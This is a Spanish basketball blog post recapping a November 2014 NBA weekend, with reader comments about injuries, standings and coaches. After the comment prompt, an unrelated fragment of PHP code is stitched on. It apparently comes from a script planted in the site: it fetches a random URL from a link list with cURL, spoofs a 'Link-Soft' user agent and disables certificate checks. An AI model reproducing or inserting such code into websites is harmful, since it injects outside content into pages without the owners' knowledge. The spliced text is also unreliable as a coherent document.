Informe del fin de semana: Noches de primeras

10 de November de 2014 por TheDeerHunter

Fin de semana intenso y la parroquia dando el callo incluso con comentarios de partidos en directo. Los Lakers por fin han estrenado su casillo de victorias y dejan a los Sixers (¡oh, sorpresa!) como único equipo a 0 de toda la liga. En la cabeza del Oeste, derrota de los 3 equipos invictos hasta la fecha: Rockets, Grizzlies y Warriors.

El viernes noche de infarto con tres choques resueltos en hasta 5 prórrogas. Anunciásteis la lesión de Ricky Rubio en tiempo real y también constatamos que la capacidad de diagnóstico temprano de Nacho no es su fuerte.

“IM-PRE-SIO-NAN-TE el esguince de Rubio. Dios! lo que duele. De esos me hacía yo en mis tiempos mozos. No creo que le lleve mucho,” Nacho

Serán como mínimo dos meses sin ver a Ricky de corto y para colmo a los Wolves se les escapó la victoria en la prórroga ante un rival asequible como es Orlando.

“Fournier echándose ofensivamente el equipo a las espaldas y en defensa tuvo unas cuantas buenas acciones sobre Kevin Martin, como muestra final jugada del último segundo que Martin falla y se va a la prórroga. Gran partido también de Aaron Gordon que anotó 12 de sus 17 puntos en el último cuarto más prórroga, incluido un triple desde la esquina que fue el que sentenció el choque.”Denise 

El otro foco de atención el viernes fue el trámite de los Bulls en Philadelphia, sin Rose en jornada de descanso. Los Sixers terminaron siendo menos perita en dulce de lo esperado y les faltó muy poco para amargar la noche al equipo de Thibodeau, donde el mejor fue Mike Dunleavy. Antes de eso hubo un espectacular Hawks@Hornets que se resolvió tras dos prórrogas con un triple demencial de Lance Stephenson. Después los Celtics comenzaron su gran fin de semana ganando a Indiana, aunque Marcus Smart terminó lesionado. Por su parte, los Nets ganaron el derbi con un gran Deron Williams, los Grizzlies se impusieron por los pelos en Oklahoma y los sorprendentes Kings necesitaron de dos prórrogas para doblegar a los Suns.

Finalmente, Dirk Nowitzki estuvo como en sus mejores tardes en la victoria de Dallas en Salt Lake City y LeBron James se puso el disfraz de Magic Johnson (11 asistencias) para involucrar a los suyos en la victoria de los Cavs en Denver.

El sábado, como no podía ser de otra manera, estuvimos bien atentos al partidazo entre Blazers y Clippers, donde terminaron llevándose el gato al agua los segundos.

“Tremendo partido, empate a 79 creo al final del 3er cuarto, llega JJ Redick absolutamente on fire y en 3 minutos anota 10 puntos casi consecutivos que rompen el partido poniendo a los Clippers por encima sobre 6-10 puntos, se une a la fiesta Chris Paul, y cuando quedaban 2 minutos y el partido parecía resuelto, el señor Damian Lillard ha metido como 11 ó 12 puntos consecutivos en 2 minutos que han apretado el encuentro tanto que al final se ha decidido en el carrusel de tiros libres donde los angelinos no han fallado.
Un monumento al Señor Damian Lillard!!!! Y otro para Don Chris Paul (…) Decidle a Adam Silver que se enrolle y ponga mas partidos los sábados a esta hora.” Denise

Pues ya has oído Adam, que no te lo tengamos que repetir.

Fue una noche en la que los Warriors se pusieron líderes cargándose a los Rockets con otra exhibición del angelito Stephen Curry (34 puntos y 10 rebotes) y beneficiándose de la derrota de los Grizzlies en Milwaukee. Alguno ya pide el CoY para Kidd si los Bucks terminan colándose en Playoffs.

Los Wizards ganaron en Indiana con partidazo de John Wall y Nene y los Heat se impusieron en casa a unos Wolves que ya juegan sin Rubio. Kyle Korver les hizo un hijo a los Knicks y Evan Turner le dio la victoria a los suyos con un gran partido ante los Bulls. Finalmente, Anthony Davis se doctoró ante Tim Duncan y dejó en negativo a los campeones.

Ayer domingo se abría la veda con un Magic-Nets que acabarían llevándose los locales de la mano de Bojan Bogdanovic a pesar de la oposición de Nikola Vucevic pero lo más importante fue la primera victoria de los Lakers (ante los Hornets y liderados por Jeremy Lin) y la primera derrota de los Warriors (ante los Suns con Isaiah Thomas una vez más destacado). Los que siguen con su casillero a 0 de victorias son los Sixers que cayeron por 32 puntos de diferencia ante los Raptors. También cayeron Nuggets y Pistons ante Blazers y Jazz respectivamente y sorprendentemente los Kings ante unos Thunder de circunstancias. Otro de los nombres de la noche fue el de Luol Deng, que se fue a los 30 puntos en la victoria de los Heat ante los Mavs.

Así que tras el fin de semana la conferencia Este está encabezada por los Raptors, con 6 victorias y 1 sola derrota, seguidos de cerca por Miami, Chicago y Washington. En el Oeste mandan Memphis y Houston también con 6 victorias y 1 derrota con Golden State al acecho.

Comenta

5 comentarios a esta entrada

  1. Nacho dice:
    #1

    Pero vamos, ¿alguien dudaba de mi acertado diagnóstico temprano?
    En la porra, el RoY se lo doy a Embiid, porque adelantará sus plazos de recuperación, jajajajajaja

      Citar

  2. Nacho dice:
    #2

    Pues se van aclarando cositas…
    Toronto va. Viento en popa. 6-1, solo han caído en su viaje a Miami, y otros (léase Bulls) han tenido más plácido calendario. Ahora encadenan cinco partidos en casa, hasta que el día 22 visiten a los Cav´s, Chicago y Memphis serán los rivales más duros, si encadenan al menos 4 victorias abrirán hueco, y va a ser difícil desbancarlos de una de las plazas de ventaja de campo.
    Miami es el otro equipo serio de la conferencia. 5-2, con tres rivales del Oeste incluidos. Son los que derrotaron a los Raptors.
    Wizards y Bulls con calendarios más plácidos, sobre todo los capitalinos, son los otros equipos al frente del Este. Dubitativos en Chicago, producto también del estado de Rose. Y Whasington ha perdido contra Toronto y Heat. El resto partidos de pachangueo. No los veo bien, pero…
    Celtic’s, Bucks y Nets (¡Bogdanovic RoY!) lo positivo
    Pistons y Cav´s pueden ir pidiendo cita al psiquiatra si no lo remedian pronto.
    Hornets, Magic, Hawks, Sixers en lo esperado.
    Indiana en la UVI más recóndita del Estado del basketball, no sabremos si saldrán de ahí
    Y bueno, pues eso, lo de los Knicks, de momento tienen Zen, equipo zin zentido, pero con Zen.
    Vader & company, pedid la nacionalidad canadiense!!!

      Citar

  3. Azabel dice:
    #3

    he visto al Heat y la verdad, es luego de Bulls y Cavs el cuco del este, o sino el principal
    Riley se merece el manager del año sin dudas, perdio a Lebron y tendra un equipo peleando por final de conferencia

    El Heat tiene un buen entrenador, un sistema que funciona a la perfecciòn y que los jugadores en su mayoria conocen y vienen como si fuera poco con un envion ganador

    Bosh hipermotivado, no sera un MVP pero sin dudas es un all-star y en el este con uno asi alcanza, Wade por el momento sano y jugando un temporadon

    y a pesar de que todos dicen que han quedado solos, pocos se han percatado de la importancia de Deng, es verdad no es Lebron, pero la temporada pasada fue un all-star, y creo que le encaja perfecto el rol que tenia Lebron, defender como aun bestia y ajustar su ofensiva, va acomodándose a los sistemas y anoche despertó ofensivamente

    mucho cuidado con el Heat

      Citar

  4. Denise dice:
    #4

    Jojo maestro Zin Zentido…

    Y quien creeis que va a ser el primer coach expulsado? Yo a principio de temporada, habría apostado por McHale de los Rockets, pero con esta rachilla (para mi ficticia) que han pillado, le da crédito para un par de meses, por lo que creo que el primero va a ser el tal Clifford de los Bobcats, y Jordan pondrá en su lugar un coach mas cool y con mas nombre. Por mi, ojala el primer “fired” sea para Jacque Vaughn.

      Citar

  5. Denise dice:
    #5

    Denise:

    el tal Clifford de los Bobcats,

    De los Hornets queria decir….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>